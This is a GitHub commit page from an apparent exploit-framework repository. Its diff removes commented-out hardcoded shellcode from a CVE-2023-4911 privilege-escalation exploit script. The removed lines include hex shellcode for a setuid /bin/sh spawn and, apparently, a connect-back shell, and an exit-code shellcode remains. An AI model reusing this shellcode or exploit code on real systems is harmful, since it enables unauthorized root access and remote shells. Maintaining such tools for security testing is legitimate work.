Skip to content

Commit

Permalink
removed commented out hardcoded shellcode
Browse files Browse the repository at this point in the history
  • Loading branch information
jheysel-r7 committed Nov 16, 2023
1 parent 49bd41e commit 8b62160
Showing 1 changed file with 0 additions and 4 deletions.
4 changes: 0 additions & 4 deletions data/exploits/CVE-2023-4911/cve_2023_4911.py
Expand Up @@ -33,8 +33,6 @@

unhex = lambda v: binascii.unhexlify(v.replace(" ", ""))

# setresuid(euid, euid, euid); execve("/bin/sh", ["sh", NULL], NULL);
# exit(0x66)
ARCH = {
"i686": {
"shellcode": unhex(
Expand All @@ -46,8 +44,6 @@
},
"x86_64": {
"shellcode": unhex(
#"6a6b580f0589c789c289c66a75580f056a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05"
#"4831ff4889fe6a75580f054831ff4889fe6a77580f0531ff6a095899b6104889d64d31c96a22415a6a075a0f054885c078516a0a4159506a2958996a025f6a015e0f054885c0783b489748b90200115cc0a87b01514889e66a105a6a2a580f05594885c0792549ffc97418576a23586a006a054889e74831f60f0559595f4885c079c76a3c586a015f0f055e6a265a0f054885c078edffe6"
"METASPLOIT_SHELL_CODE"
),
"exitcode": unhex("6a665f6a3c580f05"),
Expand Down

0 comments on commit 8b62160

Please sign in to comment.